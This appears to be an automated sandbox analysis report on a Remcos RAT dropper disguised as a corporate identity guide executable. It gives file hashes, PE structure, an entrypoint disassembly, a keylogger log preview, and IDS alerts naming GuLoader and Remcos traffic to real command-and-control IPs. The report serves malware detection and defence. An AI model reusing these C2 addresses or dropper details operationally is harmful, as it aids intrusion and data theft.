                                                                                                                                                                                        SHA-512:8238980FE0A953B2FD02AE3E1CAB2130C69A971BD8600AD88AA350D2BEBA21657E5350537C5F129D0E9936D9FC25462F9A0A068C95096743C70BD0E269DA37BC
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Process:C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):9024
                                                                                                                                                                                        Entropy (8bit):4.915362970792497
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:nbskfPxqJalVbEEuR/9WTZcs+JjwB6FLEF:h44lVbED1MZEjbU
                                                                                                                                                                                        MD5:98BCC29584ED7524EE0492F24B14615D
                                                                                                                                                                                        SHA1:6493DBB937D31911C82A8D39B553891D8B0A49BD
                                                                                                                                                                                        SHA-256:39C72F185A55457B25BEC67A88BAE7FDBCCEE4880AA8F8D132FBC9DEB3D547BE
                                                                                                                                                                                        SHA-512:8C1A3121923FCE3B588B68F917F2B14BBD5B098434111CFDEBE47D17DF84E377AA2328F5E3F5C1712FCE65682E1A37160A3BEA7789A6205A6BFAB6F8227B9DF3
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Process:C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):39320
                                                                                                                                                                                        Entropy (8bit):4.944998067109953
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:m0jW1kE+iOvfiB0MmQW8ySRbgWKmj3zLJVDvKOu4gLZ77l3IFN:m0OkhyB0fS7KmDZVDCF4gtFaN
                                                                                                                                                                                        MD5:D1BF712E659E946D9EF4FC4CCEF11819
                                                                                                                                                                                        SHA1:50817BAD8D0F4FF70330FA3B0B0391E7686DBB8B
                                                                                                                                                                                        SHA-256:7BB763ED1B34F080F73FDC632C65DB5B1D261B0CBCC9B6BB79E5C14297641867
                                                                                                                                                                                        SHA-512:FE47F385330B3C71B345A584BBEF83783D060902B7677652763CF07A6A0FF69C5B84DD6E6B34316E72907966427DA317A852606F18999C4A3238EC382CA4C3A1
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):336
                                                                                                                                                                                        Entropy (8bit):3.372779061566145
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:6:KlrlxulDBA5YcIeeDAlslrlxulDB0bWAAe5ElrlxulDBtlR1ylrlxulDBzbWAv:KlrlxuluecmlrlxulubWFe5ElrlxulcI
                                                                                                                                                                                        MD5:1F8E67F2CE8D5C22338439E4A50B28E5
                                                                                                                                                                                        SHA1:268CF27FA0AD58250CD370F17DB380494739C350
                                                                                                                                                                                        SHA-256:BBECB263D5156AB6D0E909BD12CB5D18366D5A225AAA0E1CAB12D9D19BA386D4
                                                                                                                                                                                        SHA-512:F5DA74E8517C30AD4369268F5AC1E784469183FA4C17FCC0E9CCF013084900FCA53C13809826D331B796D7598FCA5DBC60048C7A76176ABD7AFE1FD8F67E4624
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, Author: Joe Security
Preview:[2023/10/30 14:17:51 Offline Keylogger Started] [2023/10/30 14:17:51 Program Manager] [Win]r [2023/10/30 14:17:52 Run] [2023/10/30 14:17:56 Program Manager]
                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                        Entropy (8bit):7.558574413908491
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                        File name:DHRI_kurumsal kimlik rehberi-2023.exe
                                                                                                                                                                                        File size:740'313 bytes
                                                                                                                                                                                        MD5:f6cbf303899397b7d28e19930d48627d
                                                                                                                                                                                        SHA1:c3b2d0902bc0724228519030d341294db265f379
                                                                                                                                                                                        SHA256:2eb8015d95b1f69eca4acc3d64c0ed58125431a19df865a493990025ebe5b40a
                                                                                                                                                                                        SHA512:0e70a67684146e4dd4d3d7984ef66b03f5370340b82cc86b1d79408c102b06bb69a31a17addec773c24fddd3e4780c35a780d549bd944aaa33a0b73f68f57b68
                                                                                                                                                                                        SSDEEP:12288:uJWNBQf/tJK1Znk1YAxpqPf+4u+432AAjI9XLvlDwLEuSflue6VfFtqdXFJ:uWg49k1jcdDHjkbvFHfluNtqdXFJ
                                                                                                                                                                                        TLSH:5AF4E0216A2AF903E2F203F09567DF756B618D550E7F8A738791EE2B78FC3811D18216
                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h.........
                                                                                                                                                                                        Icon Hash:4dcdeeee7d595823
                                                                                                                                                                                        Entrypoint:0x40338f
                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                        Time Stamp:0x5C157F2E [Sat Dec 15 22:24:46 2018 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                                                                                                                        Instruction
                                                                                                                                                                                        sub esp, 000002D4h
                                                                                                                                                                                        push ebx
                                                                                                                                                                                        push esi
                                                                                                                                                                                        push edi
                                                                                                                                                                                        push 00000020h
                                                                                                                                                                                        pop edi
                                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                                        push 00008001h
                                                                                                                                                                                        mov dword ptr [esp+14h], ebx
                                                                                                                                                                                        mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                        call dword ptr [004080A8h]
                                                                                                                                                                                        call dword ptr [004080A4h]
                                                                                                                                                                                        and eax, BFFFFFFFh
                                                                                                                                                                                        cmp ax, 00000006h
                                                                                                                                                                                        mov dword ptr [00434EECh], eax
                                                                                                                                                                                        je 00007FA3148A3BD3h
                                                                                                                                                                                        push ebx
                                                                                                                                                                                        call 00007FA3148A6E85h
                                                                                                                                                                                        cmp eax, ebx
                                                                                                                                                                                        je 00007FA3148A3BC9h
                                                                                                                                                                                        push 00000C00h
                                                                                                                                                                                        call eax
                                                                                                                                                                                        mov esi, 004082B0h
                                                                                                                                                                                        push esi
                                                                                                                                                                                        call 00007FA3148A6DFFh
                                                                                                                                                                                        push esi
                                                                                                                                                                                        call dword ptr [00408150h]
                                                                                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                        cmp byte ptr [esi], 00000000h
                                                                                                                                                                                        jne 00007FA3148A3BACh
                                                                                                                                                                                        push 0000000Ah
                                                                                                                                                                                        call 00007FA3148A6E58h
                                                                                                                                                                                        push 00000008h
                                                                                                                                                                                        call 00007FA3148A6E51h
                                                                                                                                                                                        push 00000006h
                                                                                                                                                                                        mov dword ptr [00434EE4h], eax
                                                                                                                                                                                        call 00007FA3148A6E45h
                                                                                                                                                                                        cmp eax, ebx
                                                                                                                                                                                        je 00007FA3148A3BD1h
                                                                                                                                                                                        push 0000001Eh
                                                                                                                                                                                        call eax
                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                        je 00007FA3148A3BC9h
                                                                                                                                                                                        or byte ptr [00434EEFh], 00000040h
                                                                                                                                                                                        push ebp
                                                                                                                                                                                        call dword ptr [00408044h]
                                                                                                                                                                                        push ebx
                                                                                                                                                                                        call dword ptr [004082A0h]
                                                                                                                                                                                        mov dword ptr [00434FB8h], eax
                                                                                                                                                                                        push ebx
                                                                                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                                                                                        push 000002B4h
                                                                                                                                                                                        push eax
                                                                                                                                                                                        push ebx
                                                                                                                                                                                        push 0042B208h
                                                                                                                                                                                        call dword ptr [00408188h]
                                                                                                                                                                                        push 0040A2C8h
                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7f000 | 0x2adb8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x6627 | 0x6800 | False | 0.6643629807692307 | data | 6.451784672975888 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x8000 | 0x14a2 | 0x1600 | False | 0.4405184659090909 | data | 5.025178929113415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xa000 | 0x2aff8 | 0x600 | False | 0.517578125 | data | 4.03532418489749 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x35000 | 0x4a000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x7f000 | 0x2adb8 | 0x2ae00 | False | 0.2931623542274053 | data | 4.844476982593675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_BITMAP | 0x7f490 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174 |
| RT_ICON | 0x7f7f8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.25415532946882763 |
| RT_ICON | 0x90020 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3174795038890057 |
| RT_ICON | 0x994c8 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.3372458410351202 |
| RT_ICON | 0x9e950 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.30196032120925836 |
| RT_ICON | 0xa2b78 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.37105809128630707 |
| RT_ICON | 0xa5120 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.41135084427767354 |
| RT_ICON | 0xa61c8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.35954157782515994 |
| RT_ICON | 0xa7070 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5004098360655738 |
| RT_ICON | 0xa79f8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.35333935018050544 |
| RT_ICON | 0xa82a0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.35023041474654376 |
| RT_ICON | 0xa8968 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.26372832369942195 |
| RT_ICON | 0xa8ed0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5647163120567376 |
| RT_DIALOG | 0xa9338 | 0x144 | data | English | United States | 0.5216049382716049 |
| RT_DIALOG | 0xa9480 | 0x13c | data | English | United States | 0.5506329113924051 |
| RT_DIALOG | 0xa95c0 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0xa96c0 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0xa97e0 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0xa9840 | 0xae | data | English | United States | 0.6609195402298851 |
| RT_VERSION | 0xa98f0 | 0x178 | VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79 | English | United States | 0.5664893617021277 |
| RT_MANIFEST | 0xa9a68 | 0x34e | XML 1.0 document, ASCII text, with very long lines (846), with no line terminators | English | United States | 0.5141843971631206 |

| DLL | Import |
|---|---|
| KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
| USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage |
| GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
| SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW |
| ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
| COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
| ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 10/30/23-14:17:52.394655 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 50094 | 2402 | 192.168.11.20 | 94.156.6.253 |
| 10/30/23-14:17:49.596833 | TCP | 2855192 | ETPRO TROJAN GuLoader Encoded Binary Request M2 | 50093 | 80 | 192.168.11.20 | 217.147.225.69 |
| 10/30/23-14:20:09.593886 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 2402 | 50094 | 94.156.6.253 | 192.168.11.20 |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210046053 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210119009 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210130930 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210196018 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210248947 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210329056 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210346937 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210445881 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210460901 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210534096 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210596085 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210649967 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210730076 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210777998 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210865974 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210902929 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210988045 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211030006 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211097002 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211147070 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211204052 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211263895 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211308956 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211354017 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211429119 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211484909 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211534977 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211587906 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211649895 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211692095 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211766958 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211838007 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211939096 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.515929937 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516050100 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516144037 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516155005 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516256094 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516314030 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516343117 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516438007 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516442060 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516519070 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516540051 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516633034 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516653061 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516726971 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516733885 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516807079 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516830921 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516921043 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516962051 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517008066 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517029047 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517091036 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517115116 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517169952 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517216921 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517275095 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517301083 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517364979 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517398119 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517456055 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517492056 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517545938 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517606020 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517676115 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517707109 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517767906 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517788887 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517844915 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517889977 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517936945 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517991066 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518040895 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518089056 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518145084 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518172979 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518249989 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518268108 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518357992 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518383026 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518440008 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518460035 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518521070 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518563986 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518611908 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518663883 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518734932 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518744946 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518831968 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518834114 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518897057 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518933058 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518989086 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519032001 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519095898 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519119978 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519198895 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519217014 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519290924 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519314051 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519401073 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519433022 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519490957 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519505024 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519560099 CET5009380192.168.11.20217.147.225.69
